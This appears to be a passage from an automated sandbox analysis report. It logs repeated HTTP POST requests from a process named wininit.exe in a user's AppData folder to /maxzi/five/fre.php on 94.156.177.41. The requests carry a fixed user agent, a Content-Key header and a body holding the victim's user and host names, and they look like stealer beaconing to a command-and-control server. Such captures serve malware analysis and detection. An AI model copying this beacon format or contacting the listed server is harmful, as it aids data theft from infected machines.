                                                Nov 20, 2024 10:12:20.388739109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:21.119462013 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:21 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.224921894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:21.260699034 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:21.265845060 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:22.167171955 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:22 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.224921994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:22.389425993 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:22.394588947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:23.269963026 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:23 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.224922094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:23.414782047 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:23.419939041 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:24.148257971 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:24 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.224922194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:24.299547911 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:24.307414055 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:25.196887970 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:25 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.224922294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:25.348052025 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:25.356967926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:26.119709969 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:26 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                55192.168.2.224922394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:26.266532898 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:26.273859978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:27.018465996 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:26 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                56192.168.2.224922494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:27.156534910 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:27.165071964 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:27.971154928 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:27 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                57192.168.2.224922594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:28.105493069 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:28.110543013 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:28.854964018 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:28 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                58192.168.2.224922694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:28.993278980 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:28.999727964 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:29.827569008 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:29 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                59192.168.2.224922794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:29.960427999 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:29.966425896 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:30.830818892 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:30 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                60192.168.2.224922894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:30.977432966 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:30.982470036 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:31.861255884 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:31 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                61192.168.2.224922994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:32.017537117 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:32.023730993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:32.776916981 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:32 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                62192.168.2.224923094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:32.967566013 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:32.972572088 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:33.728002071 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:33 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                63192.168.2.224923194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:33.886928082 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:33.892076015 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:34.632595062 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:34 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                64192.168.2.224923294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:34.769426107 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:34.777103901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:35.505090952 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:35 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                65192.168.2.224923394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:35.640115976 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:35.645215988 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:36.375921011 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:36 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                66192.168.2.224923494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:36.515726089 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:36.520685911 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:37.246592045 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                67192.168.2.224923594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:37.386193991 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:37.391331911 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:38.148303986 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:38 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                68192.168.2.224923694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:38.290440083 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:38.295670033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:39.034765005 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:38 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                69192.168.2.224923794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:39.184828997 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
